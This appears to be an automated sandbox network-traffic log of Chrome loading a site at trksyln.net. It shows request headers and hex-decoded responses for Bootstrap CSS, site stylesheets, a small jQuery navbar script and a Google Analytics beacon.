2024-10-31 18:19:22 UTC	597	OUT	GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://trksyln.net sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:22 UTC	762	IN	HTTP/1.1 200 OK Connection: close Content-Length: 155845 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: text/css; charset=utf-8 X-JSD-Version: 5.0.2 X-JSD-Version-Type: version ETag: W/"260c5-fByeBXPlzqi603M74vxjqoxo6o0" Accept-Ranges: bytes Date: Thu, 31 Oct 2024 18:19:22 GMT Age: 645606 X-Served-By: cache-fra-eddf8230097-FRA, cache-dfw-kdfw8210124-DFW X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-10-31 18:19:22 UTC	16384	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d Data Ascii: @charset "UTF-8";/! Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
2024-10-31 18:19:22 UTC	16384	IN	Data Raw: 74 74 65 72 2d 79 3a 30 7d 2e 67 2d 78 6c 2d 31 2c 2e 67 78 2d 78 6c 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 78 6c 2d 31 2c 2e 67 79 2d 78 6c 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 78 6c 2d 32 2c 2e 67 78 2d 78 6c 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 35 72 65 6d 7d 2e 67 2d 78 6c 2d 32 2c 2e 67 79 2d 78 6c 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 35 72 65 6d 7d 2e 67 2d 78 6c 2d 33 2c 2e 67 78 2d 78 6c 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 2e 67 2d 78 6c 2d 33 2c 2e 67 79 2d 78 6c 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 2e 67 2d 78 6c 2d 34 2c 2e 67 78 2d 78 6c 2d 34 7b 2d 2d 62 Data Ascii: tter-y:0}.g-xl-1,.gx-xl-1{--bs-gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--bs-gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--bs-gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--bs-gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--bs-gutter-x:1rem}.g-xl-3,.gy-xl-3{--bs-gutter-y:1rem}.g-xl-4,.gx-xl-4{--b
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 69 6e 67 3a 31 72 65 6d 20 2e 37 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 6e 6f 74 28 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 73 68 6f 77 6e 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 36 32 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 Data Ascii: ing:1rem .75rem}.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floati
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 66 64 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 66 6f 63 75 73 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 31 33 2c 31 31 30 2c 32 35 33 2c 2e 35 29 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 61 63 74 69 76 65 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 63 68 65 63 6b 3a 63 68 65 63 6b 65 64 2b 2e Data Ascii: fd}.btn-outline-primary:hover{color:#fff;background-color:#0d6efd;border-color:#0d6efd}.btn-check:focus+.btn-outline-primary,.btn-outline-primary:focus{box-shadow:0 0 0 .25rem rgba(13,110,253,.5)}.btn-check:active+.btn-outline-primary,.btn-check:checked+.
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 78 2d 73 68 61 64 6f 77 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 Data Ascii: vbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem;transition:box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 Data Ascii: rst-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-hori
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 30 66 30 66 30 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61 72 74 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 7b 72 69 67 68 74 3a 63 61 6c 63 28 2d 2e 35 72 65 6d 20 2d 20 31 70 78 29 3b 77 69 64 74 68 3a 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61 Data Ascii: er-bottom:1px solid #f0f0f0}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::before,.bs-popover-sta
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 32 7b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 33 7b 70 61 64 64 69 6e 67 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 34 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 35 7b 70 61 64 64 69 6e 67 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 31 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 32 35 72 65 6d 21 69 6d Data Ascii: adding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!im
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 74 7d 2e 6d 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 30 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 Data Ascii: t}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!importa
2024-10-31 18:19:23 UTC	8389	IN	Data Raw: 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 31 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 32 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 33 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 73 2d 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 Data Ascii: xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{padding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:22 UTC	548	OUT	GET /resources/css/site.css HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:23 UTC	298	IN	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Wed, 21 Feb 2024 00:32:23 GMT Accept-Ranges: bytes ETag: "8045b96f5d64da1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:22 GMT Connection: close Content-Length: 11097
2024-10-31 18:19:23 UTC	11097	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 42 61 6c 6f 6f 2b 50 61 61 6a 69 7c 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 29 3b 0d 0a 0d 0a 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 2f 2a 20 20 2d 2d 62 6c 75 65 3a 20 23 31 65 35 34 39 66 3b 0d 0a 20 20 2d 2d 69 6e 64 69 67 6f 3a 20 23 36 39 35 61 61 36 3b 0d 0a 20 20 2d 2d 70 75 72 70 6c 65 3a 20 23 36 66 34 32 63 31 3b 0d 0a 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 38 33 65 38 63 3b 0d 0a 20 20 2d 2d 72 65 64 3a 20 23 65 63 31 38 35 64 3b 0d 0a 20 Data Ascii: @charset "UTF-8";@import url("https://fonts.googleapis.com/css?family=Baloo+Paaji\|Open+Sans:300,300i,400,400i,600,600i,700,700i");:root { /* --blue: #1e549f; --indigo: #695aa6; --purple: #6f42c1; --pink: #e83e8c; --red: #ec185d;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:22 UTC	550	OUT	GET /resources/css/navbar.css HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:23 UTC	297	IN	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Fri, 09 Feb 2024 18:56:05 GMT Accept-Ranges: bytes ETag: "809027a2895bda1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:22 GMT Connection: close Content-Length: 6700
2024-10-31 18:19:23 UTC	6700	IN	Data Raw: 20 20 2e 68 61 6d 62 75 72 67 65 72 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 66 69 Data Ascii: .hamburger { display: inline-block; cursor: pointer; -webkit-transition-property: opacity, -webkit-filter; transition-property: opacity, -webkit-filter; transition-property: opacity, filter; transition-property: opacity, fi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:22 UTC	534	OUT	GET /resources/js/navbar.js HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:23 UTC	307	IN	HTTP/1.1 200 OK Content-Type: application/javascript Last-Modified: Tue, 20 Feb 2024 14:57:02 GMT Accept-Ranges: bytes ETag: "0b39afd64da1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:22 GMT Connection: close Content-Length: 175
2024-10-31 18:19:23 UTC	175	IN	Data Raw: 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 24 28 27 23 6e 61 76 2d 74 6f 67 67 6c 65 27 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 69 73 2d 61 63 74 69 76 65 27 29 0d 0a 20 20 20 20 20 20 20 20 24 28 27 75 6c 2e 6e 61 76 27 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 73 68 6f 77 27 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a Data Ascii: $(document).ready(function () { $('#nav-toggle').click(function () { $(this).toggleClass('is-active') $('ul.nav').toggleClass('show'); });});

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49767	216.239.34.181	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:24 UTC	1260	OUT	POST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=page_view&_fv=2&_nsi=1&_ss=2&_c=1&_ee=1&tfd=3241 HTTP/1.1 Host: analytics.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:24 UTC	1033	IN	HTTP/1.1 302 Found Location: https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=1627253267.1730398763&dbk=9479371496876134802&dma=0&en=page_view&gtm=45je4au0v9106823843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F Access-Control-Allow-Origin: * Date: Thu, 31 Oct 2024 18:19:24 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0 Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],} Server: Golfe2 Content-Length: 455 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:24 UTC	345	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2d 73 61 6e 64 62 6f 78 2f 72 65 67 69 73 74 65 72 2d 63 6f 6e 76 65 72 73 69 6f 6e 3f 5f 63 3d 31 26 61 6d 70 3b 63 69 64 3d 31 36 32 37 32 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=16272
